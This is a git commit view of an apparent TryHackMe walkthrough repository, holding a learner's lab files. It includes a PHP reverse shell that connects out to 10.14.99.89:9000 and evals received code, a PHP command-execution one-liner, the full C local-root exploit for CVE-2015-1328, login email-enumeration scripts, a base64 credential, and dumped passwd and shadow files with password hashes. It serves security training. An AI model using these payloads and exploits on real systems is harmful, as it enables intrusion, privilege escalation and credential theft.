curo/TryHackMe
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
Curo
2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
Walkthroughs/AdvancedSQLInfections/tmp/out.txt Executable file
View File

@@ -0,0 +1 @@
10.4.24-MariaDB

1
Walkthroughs/AdvancedSQLInfections/tmp/out1.txt Executable file
View File

@@ -0,0 +1 @@
C:/xampp/mysql

3
Walkthroughs/AuthenticationBypass/valid_users.txt Normal file
View File

@@ -0,0 +1,3 @@
simon
steve
robert

BIN
Walkthroughs/ContenDiscovery/favicon.ico Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 1.4 KiB

59
Walkthroughs/EnumerationAndBruteforce/email_enumeration.py Normal file
View File

@@ -0,0 +1,59 @@
import requests
import sys
def check_mail(email):
url = 'http://10.10.248.22/labs/verbose_login/functions.php'
headers = {
'Host': '10.10.248.22',
'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'http://10.10.248.22',
'Connection': 'close',
'Referer': 'http://10.10.248.22/labs/verbose_login/',
}
data = {
'username': email,
'password': 'password',
'function': 'login'
}
response = requests.post(url, headers=headers, data=data)
return response.json()
def enumerate_emails(email_file):
valid_emails = []
invalid_error = "Email does not exist"
with open(email_file, 'r') as file:
emails = file.readlines()
for email in emails:
email = email.strip()
if email:
response_json = check_mail(email)
if response_json['status'] == 'error' and response_json['message'] == invalid_error:
print(f"Invalid: {email}")
else:
print(f"Valid: {email}")
valid_emails.append(email)
return valid_emails
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 email_enumeration.py <email_file>")
sys.exit(1)
email_file = sys.argv[1]
valid_emails = enumerate_emails(email_file)
print("Valid emails found\n")
for email in valid_emails:
print(email)

1
Walkthroughs/EnumerationAndBruteforce/login.txt Normal file
View File

@@ -0,0 +1 @@
YWRtaW46eWVsbG93

57
Walkthroughs/EnumerationAndBruteforce/script.py Normal file
View File

@@ -0,0 +1,57 @@
import requests
import sys
def check_email(email):
url = 'http://10.10.248.22/labs/verbose_login/functions.php'
headers = {
'Host': '10.10.248.22',
'User-Agent': 'Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'http://10.10.248.22',
'Connection': 'close',
'Referer': 'http://10.10.248.22/labs/verbose_login/',
}
data = {
'username': email,
'password': 'password', # Use a random password as we are only checking the email
'function': 'login'
}
response = requests.post(url, headers=headers, data=data)
return response.json()
def enumerate_emails(email_file):
valid_emails = []
invalid_error = "Email does not exist" # Error message for invalid emails
with open(email_file, 'r') as file:
emails = file.readlines()
for email in emails:
email = email.strip() # Remove any leading/trailing whitespace
if email:
response_json = check_email(email)
if response_json['status'] == 'error' and invalid_error in response_json['message']:
print(f"[INVALID] {email}")
else:
print(f"[VALID] {email}")
valid_emails.append(email)
return valid_emails
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 script.py <email_list_file>")
sys.exit(1)
email_file = sys.argv[1]
valid_emails = enumerate_emails(email_file)
print("\nValid emails found:")
for valid_email in valid_emails:
print(valid_email)

900000
Walkthroughs/EnumerationAndBruteforce/token.txt Normal file
View File

File diff suppressed because it is too large Load Diff

2211
Walkthroughs/EnumerationAndBruteforce/usernames_gmail.com.txt Normal file
View File

File diff suppressed because it is too large Load Diff

0
Walkthroughs/FileInclusion/cmd.php Normal file
View File

1
Walkthroughs/FileInclusion/cmd.txt Normal file
View File

@@ -0,0 +1 @@
<?PHP echo shell_exec("hostname"); ?>

1
Walkthroughs/FileInclusion/shell.php Normal file
View File

@@ -0,0 +1 @@
/*<?php /**/ error_reporting(0); $ip = '10.14.99.89'; $port = 9000; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

2
Walkthroughs/FurtherNMap/nmap_scan1.txt Normal file
View File

@@ -0,0 +1,2 @@
# Nmap 7.95 scan initiated Sat Oct 18 21:41:00 2025 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan1.txt 10.10.47.77
# Nmap done at Sat Oct 18 21:41:03 2025 -- 1 IP address (0 hosts up) scanned in 2.21 seconds

152
Walkthroughs/IntroToShell/exploit.c Normal file
View File

@@ -0,0 +1,152 @@
/*
# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328 (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
greets to beist & kaliman
2015-05-24
%rebel%
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <signal.h>
#include <fcntl.h>
#include <string.h>
#include <linux/sched.h>
#define LIB "#include <unistd.h>\n\nuid_t(*_real_getuid) (void);\nchar path[128];\n\nuid_t\ngetuid(void)\n{\n_real_getuid = (uid_t(*)(void)) dlsym((void *) -1, \"getuid\");\nreadlink(\"/proc/self/exe\", (char *) &path, 128);\nif(geteuid() == 0 && !strcmp(path, \"/bin/su\")) {\nunlink(\"/etc/ld.so.preload\");unlink(\"/tmp/ofs-lib.so\");\nsetresuid(0, 0, 0);\nsetresgid(0, 0, 0);\nexecle(\"/bin/sh\", \"sh\", \"-i\", NULL, NULL);\n}\n return _real_getuid();\n}\n"
static char child_stack[1024*1024];
static int
child_exec(void *stuff)
{
char *file;
system("rm -rf /tmp/ns_sploit");
mkdir("/tmp/ns_sploit", 0777);
mkdir("/tmp/ns_sploit/work", 0777);
mkdir("/tmp/ns_sploit/upper",0777);
mkdir("/tmp/ns_sploit/o",0777);
fprintf(stderr,"mount #1\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
exit(-1);
}
file = ".access";
chmod("/tmp/ns_sploit/work/work",0777);
} else file = "ns_last_pid";
chdir("/tmp/ns_sploit/o");
rename(file,"ld.so.preload");
chdir("/");
umount("/tmp/ns_sploit/o");
fprintf(stderr,"mount #2\n");
if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
exit(-1);
}
chmod("/tmp/ns_sploit/work/work",0777);
}
chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
umount("/tmp/ns_sploit/o");
}
int
main(int argc, char **argv)
{
int status, fd, lib;
pid_t wrapper, init;
int clone_flags = CLONE_NEWNS | SIGCHLD;
fprintf(stderr,"spawning threads\n");
if((wrapper = fork()) == 0) {
if(unshare(CLONE_NEWUSER) != 0)
fprintf(stderr, "failed to create new user namespace\n");
if((init = fork()) == 0) {
pid_t pid =
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
if(pid < 0) {
fprintf(stderr, "failed to create new mount namespace\n");
exit(-1);
}
waitpid(pid, &status, 0);
}
waitpid(init, &status, 0);
return 0;
}
usleep(300000);
wait(NULL);
fprintf(stderr,"child threads done\n");
fd = open("/etc/ld.so.preload",O_WRONLY);
if(fd == -1) {
fprintf(stderr,"exploit failed\n");
exit(-1);
}
fprintf(stderr,"/etc/ld.so.preload created\n");
fprintf(stderr,"creating shared library\n");
lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
write(lib,LIB,strlen(LIB));
close(lib);
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
if(lib != 0) {
fprintf(stderr,"couldn't create dynamic library\n");
exit(-1);
}
write(fd,"/tmp/ofs-lib.so\n",16);
close(fd);
system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
execl("/bin/su","su",NULL);
}

1
Walkthroughs/IntroToShell/flag3.txt Normal file
View File

@@ -0,0 +1 @@
THM-3847834

36
Walkthroughs/IntroToShell/passwd Normal file
View File

@@ -0,0 +1,36 @@
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
karen:x:1001:1001::/home/karen:/bin/sh
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
matt:x:1002:1002::/home/matt:/bin/sh

37
Walkthroughs/IntroToShell/passwd.txt Normal file
View File

@@ -0,0 +1,37 @@
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
gerryconway:x:1001:1001::/home/gerryconway:/bin/sh
user2:x:1002:1002::/home/user2:/bin/sh
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
karen:x:1003:1003::/home/karen:/bin/sh

36
Walkthroughs/IntroToShell/password1.txt Normal file
View File

@@ -0,0 +1,36 @@
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
karen:x:1001:1001::/home/karen:/bin/sh
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
matt:x:1002:1002::/home/matt:/bin/sh

37
Walkthroughs/IntroToShell/passwords.txt Normal file
View File

@@ -0,0 +1,37 @@
root:*:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:*:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:*:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:*:103:106::/nonexistent:/usr/sbin/nologin
syslog:*:104:110::/home/syslog:/usr/sbin/nologin
_apt:*:105:65534::/nonexistent:/usr/sbin/nologin
tss:*:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:*:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:*:108:113::/nonexistent:/usr/sbin/nologin
sshd:*:109:65534::/run/sshd:/usr/sbin/nologin
landscape:*:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:*:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:!:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:!!:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:!:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:1001:1001::/home/gerryconway:/bin/sh
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
lxd:!:998:100::/var/snap/lxd/common/lxd:/bin/false
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/home/karen:/bin/sh

36
Walkthroughs/IntroToShell/passwords1.txt Normal file
View File

@@ -0,0 +1,36 @@
root:*:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/usr/sbin/nologin
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:*:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:*:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:*:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:*:103:106::/nonexistent:/usr/sbin/nologin
syslog:*:104:110::/home/syslog:/usr/sbin/nologin
_apt:*:105:65534::/nonexistent:/usr/sbin/nologin
tss:*:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:*:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:*:108:113::/nonexistent:/usr/sbin/nologin
sshd:*:109:65534::/run/sshd:/usr/sbin/nologin
landscape:*:110:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:*:111:1::/var/cache/pollinate:/bin/false
ec2-instance-connect:!:112:65534::/nonexistent:/usr/sbin/nologin
systemd-coredump:!!:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:!:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
karen:$6$ZC4srkt5HufYpAAb$GVDM6arO/qQU.o0kLOZfMLAFGNHXULH5bLlidB455aZkKrMvdB1upyMZZzqdZuzlJTuTHTlsKzQAbSZJr9iE21:1001:1001::/home/karen:/bin/sh
lxd:!:998:100::/var/snap/lxd/common/lxd:/bin/false
matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:1002:1002::/home/matt:/bin/sh

37
Walkthroughs/IntroToShell/shadow.txt Normal file
View File

@@ -0,0 +1,37 @@
root:*:18561:0:99999:7:::
daemon:*:18561:0:99999:7:::
bin:*:18561:0:99999:7:::
sys:*:18561:0:99999:7:::
sync:*:18561:0:99999:7:::
games:*:18561:0:99999:7:::
man:*:18561:0:99999:7:::
lp:*:18561:0:99999:7:::
mail:*:18561:0:99999:7:::
news:*:18561:0:99999:7:::
uucp:*:18561:0:99999:7:::
proxy:*:18561:0:99999:7:::
www-data:*:18561:0:99999:7:::
backup:*:18561:0:99999:7:::
list:*:18561:0:99999:7:::
irc:*:18561:0:99999:7:::
gnats:*:18561:0:99999:7:::
nobody:*:18561:0:99999:7:::
systemd-network:*:18561:0:99999:7:::
systemd-resolve:*:18561:0:99999:7:::
systemd-timesync:*:18561:0:99999:7:::
messagebus:*:18561:0:99999:7:::
syslog:*:18561:0:99999:7:::
_apt:*:18561:0:99999:7:::
tss:*:18561:0:99999:7:::
uuidd:*:18561:0:99999:7:::
tcpdump:*:18561:0:99999:7:::
sshd:*:18561:0:99999:7:::
landscape:*:18561:0:99999:7:::
pollinate:*:18561:0:99999:7:::
ec2-instance-connect:!:18561:0:99999:7:::
systemd-coredump:!!:18796::::::
ubuntu:!:18796:0:99999:7:::
gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:18796:0:99999:7:::
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:18796:0:99999:7:::
lxd:!:18796::::::
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:18796:0:99999:7:::

36
Walkthroughs/IntroToShell/shadow1.txt Normal file
View File

@@ -0,0 +1,36 @@
root:*:18561:0:99999:7:::
daemon:*:18561:0:99999:7:::
bin:*:18561:0:99999:7:::
sys:*:18561:0:99999:7:::
sync:*:18561:0:99999:7:::
games:*:18561:0:99999:7:::
man:*:18561:0:99999:7:::
lp:*:18561:0:99999:7:::
mail:*:18561:0:99999:7:::
news:*:18561:0:99999:7:::
uucp:*:18561:0:99999:7:::
proxy:*:18561:0:99999:7:::
www-data:*:18561:0:99999:7:::
backup:*:18561:0:99999:7:::
list:*:18561:0:99999:7:::
irc:*:18561:0:99999:7:::
gnats:*:18561:0:99999:7:::
nobody:*:18561:0:99999:7:::
systemd-network:*:18561:0:99999:7:::
systemd-resolve:*:18561:0:99999:7:::
systemd-timesync:*:18561:0:99999:7:::
messagebus:*:18561:0:99999:7:::
syslog:*:18561:0:99999:7:::
_apt:*:18561:0:99999:7:::
tss:*:18561:0:99999:7:::
uuidd:*:18561:0:99999:7:::
tcpdump:*:18561:0:99999:7:::
sshd:*:18561:0:99999:7:::
landscape:*:18561:0:99999:7:::
pollinate:*:18561:0:99999:7:::
ec2-instance-connect:!:18561:0:99999:7:::
systemd-coredump:!!:18798::::::
ubuntu:!:18798:0:99999:7:::
karen:$6$ZC4srkt5HufYpAAb$GVDM6arO/qQU.o0kLOZfMLAFGNHXULH5bLlidB455aZkKrMvdB1upyMZZzqdZuzlJTuTHTlsKzQAbSZJr9iE21:18798:0:99999:7:::
lxd:!:18798::::::
matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:18798:0:99999:7:::

36
Walkthroughs/IntroToShell/test.txt Normal file
View File

@@ -0,0 +1,36 @@
root:*:18561:0:99999:7:::
daemon:*:18561:0:99999:7:::
bin:*:18561:0:99999:7:::
sys:*:18561:0:99999:7:::
sync:*:18561:0:99999:7:::
games:*:18561:0:99999:7:::
man:*:18561:0:99999:7:::
lp:*:18561:0:99999:7:::
mail:*:18561:0:99999:7:::
news:*:18561:0:99999:7:::
uucp:*:18561:0:99999:7:::
proxy:*:18561:0:99999:7:::
www-data:*:18561:0:99999:7:::
backup:*:18561:0:99999:7:::
list:*:18561:0:99999:7:::
irc:*:18561:0:99999:7:::
gnats:*:18561:0:99999:7:::
nobody:*:18561:0:99999:7:::
systemd-network:*:18561:0:99999:7:::
systemd-resolve:*:18561:0:99999:7:::
systemd-timesync:*:18561:0:99999:7:::
messagebus:*:18561:0:99999:7:::
syslog:*:18561:0:99999:7:::
_apt:*:18561:0:99999:7:::
tss:*:18561:0:99999:7:::
uuidd:*:18561:0:99999:7:::
tcpdump:*:18561:0:99999:7:::
sshd:*:18561:0:99999:7:::
landscape:*:18561:0:99999:7:::
pollinate:*:18561:0:99999:7:::
ec2-instance-connect:!:18561:0:99999:7:::
systemd-coredump:!!:18796::::::
ubuntu:!:18796:0:99999:7:::
lxd:!:18796::::::
karen:$6$QHTxjZ77ZcxU54ov$DCV2wd1mG5wJoTB.cXJoXtLVDZe1Ec1jbQFv3ICAYbnMqdhJzIEi3H4qyyKO7T75h4hHQWuWWzBH7brjZiSaX0:18796:0:99999:7:::
